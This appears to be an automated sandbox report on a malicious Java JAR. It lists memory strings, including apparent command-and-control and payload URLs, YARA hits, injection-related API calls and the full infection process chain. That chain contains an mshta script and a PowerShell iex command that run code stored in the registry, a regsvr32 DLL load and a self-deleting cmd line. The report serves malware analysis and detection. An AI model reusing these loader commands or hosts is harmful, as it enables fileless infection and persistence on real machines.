Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0 |
Source: java.exe, 00000002.00000002.686346145.0000000009BC5000.00000004.00000001.sdmp |
String found in binary or memory: http://bugreport.sun.com/bugreport/ |
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.letsencrypt.org |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.letsencrypt.org0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.letsencrypt.orgk |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.root-x1.letsencrypt.org |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.root-x1.letsencrypt.org0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://cps.root-x1.letsencrypt.orgK |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.chambersign.org/chambersroot.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.securetrust.com/STCA.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.securetrust.com/STCA.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# |
Source: regsvr32.exe, 00000006.00000003.788708194.0000000002E9C000.00000004.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/ |
Source: regsvr32.exe, 00000006.00000003.788671211.0000000002E92000.00000004.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/237SFcpksL4/7t6llgwWKHmgXp/Q2Om3V7R9P_2BuKwtoBIy/oC3CbdFwoQnO6JXh/oc6axuJmX |
Source: regsvr32.exe, 00000006.00000003.770611799.0000000002EA8000.00000004.00000001.sdmp |
String found in binary or memory: http://gtr.antoinfer.com/dXpECetHmgl/jZ5QgO4VQ5n7Ya/5WG13zv8FsJ7UHAsRzG6o/tuegNb0pKsze1q8m/BFFIoL94o |
Source: regsvr32.exe, 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: java.exe, 00000002.00000002.686399629.0000000009BD5000.00000004.00000001.sdmp |
String found in binary or memory: http://java.oracle.com/ |
Source: java.exe, 00000002.00000002.692030098.000000001535C000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp, java.exe, 00000002.00000003.676737804.0000000014BE0000.00000004.00000001.sdmp |
String found in binary or memory: http://null.oracle.com/ |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.comodoca.com |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.sectigo.com |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.sectigo.com0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://policy.camerfirma.com |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://policy.camerfirma.com0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp, java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.i.lencr.org/ |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.i.lencr.org/07 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.i.lencr.org/; |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.o.lencr.org |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.o.lencr.org0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://r3.o.lencr.orgC |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://repository.swisssign.com/ |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://repository.swisssign.com/0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class2.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class2.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class3P.crl |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.chambersign.org |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.chambersign.org1 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadis.bm |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadis.bm0 |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadisglobal.com/cps |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: http://www.quovadisglobal.com/cps0 |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.c.lencr.org/ |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.c.lencr.org/0 |
Source: java.exe, 00000002.00000002.688850065.0000000009F81000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.i.lencr.org/ |
Source: java.exe, 00000002.00000002.685859249.0000000004AD7000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.i.lencr.org/0 |
Source: java.exe, 00000002.00000002.685907825.0000000004AFF000.00000004.00000001.sdmp |
String found in binary or memory: http://x1.i.lencr.org/k |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp, java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: https://data.green-iraq.com/app.dll |
Source: java.exe, 00000002.00000002.687756095.0000000009E28000.00000004.00000001.sdmp |
String found in binary or memory: https://ocsp.quovadisoffshore.com |
Source: java.exe, 00000002.00000002.687478262.0000000009D72000.00000004.00000001.sdmp |
String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: https://sectigo.com/CPS |
Source: java.exe, 00000002.00000002.686552746.0000000009C0F000.00000004.00000001.sdmp |
String found in binary or memory: https://sectigo.com/CPS0 |
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |
Source: Yara match |
File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04801ADF GetProcAddress,NtCreateSection,memset, |
6_2_04801ADF |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_048025E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
6_2_048025E5 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04804F6E NtMapViewOfSection, |
6_2_04804F6E |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04808055 NtQueryVirtualMemory, |
6_2_04808055 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F25B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
6_2_059F25B9 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E51A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
6_2_059E51A4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E4D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
6_2_059E4D10 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
6_2_059E790F |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D68EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
6_2_059D68EE |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D3C5B NtCreateSection,memset, |
6_2_059D3C5B |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F33A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
6_2_059F33A6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DCBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
6_2_059DCBA7 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D4F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
6_2_059D4F72 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EA680 NtMapViewOfSection, |
6_2_059EA680 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F0A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
6_2_059F0A00 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E6A33 NtQueryInformationProcess, |
6_2_059E6A33 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EAD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
6_2_059EAD9A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E09C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
6_2_059E09C7 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D8936 memset,NtQueryInformationProcess, |
6_2_059D8936 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EE543 NtGetContextThread,RtlNtStatusToDosError, |
6_2_059EE543 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
6_2_059D349A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F03BD NtQuerySystemInformation,RtlNtStatusToDosError, |
6_2_059F03BD |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059F133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
6_2_059F133A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DC240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
6_2_059DC240 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A275AC NtReadVirtualMemory, |
23_2_00A275AC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A379DC NtQueryInformationToken,NtQueryInformationToken,NtClose, |
23_2_00A379DC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3991C NtWriteVirtualMemory, |
23_2_00A3991C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1C29C NtQueryInformationProcess, |
23_2_00A1C29C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A266D4 NtSetInformationProcess,CreateRemoteThread, |
23_2_00A266D4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A4F002 NtProtectVirtualMemory,NtProtectVirtualMemory, |
23_2_00A4F002 |
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Code function: 2_3_1535CC3A |
2_3_1535CC3A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04806680 |
6_2_04806680 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_04807E30 |
6_2_04807E30 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_0480175B |
6_2_0480175B |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EED58 |
6_2_059EED58 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D98A0 |
6_2_059D98A0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DD8E5 |
6_2_059DD8E5 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059D2F9C |
6_2_059D2F9C |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059E0F82 |
6_2_059E0F82 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059EDE9A |
6_2_059EDE9A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DB2A4 |
6_2_059DB2A4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 6_2_059DEAFA |
6_2_059DEAFA |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3832C |
23_2_00A3832C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A15080 |
23_2_00A15080 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A130FC |
23_2_00A130FC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A190FC |
23_2_00A190FC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1A8C4 |
23_2_00A1A8C4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A19CD0 |
23_2_00A19CD0 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A258DC |
23_2_00A258DC |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A25C24 |
23_2_00A25C24 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A15814 |
23_2_00A15814 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A11C78 |
23_2_00A11C78 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2F598 |
23_2_00A2F598 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A125E8 |
23_2_00A125E8 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A275F8 |
23_2_00A275F8 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A35110 |
23_2_00A35110 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1ED6C |
23_2_00A1ED6C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2CD6C |
23_2_00A2CD6C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A30D44 |
23_2_00A30D44 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A17D48 |
23_2_00A17D48 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3A280 |
23_2_00A3A280 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1FEE4 |
23_2_00A1FEE4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A20EF4 |
23_2_00A20EF4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3CAF4 |
23_2_00A3CAF4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A146C0 |
23_2_00A146C0 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A36E34 |
23_2_00A36E34 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A35E3C |
23_2_00A35E3C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A25210 |
23_2_00A25210 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A36268 |
23_2_00A36268 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1624C |
23_2_00A1624C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A18254 |
23_2_00A18254 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2625C |
23_2_00A2625C |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1C3B4 |
23_2_00A1C3B4 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A1BB94 |
23_2_00A1BB94 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A23BE0 |
23_2_00A23BE0 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A13B24 |
23_2_00A13B24 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2AF34 |
23_2_00A2AF34 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A27F68 |
23_2_00A27F68 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A2EF74 |
23_2_00A2EF74 |
Source: C:\Windows\System32\control.exe |
Code function: 23_2_00A3BB54 |
23_2_00A3BB54 |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'' >> C:\cmdlinestart.log 2>&1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar' |
|
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M |
|
Source: C:\Windows\SysWOW64\icacls.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Uxax='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uxax).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline' |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP' |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline' |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP' |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\winapp.dll' |
|
Source: C:\Windows\System32\cmd.exe |
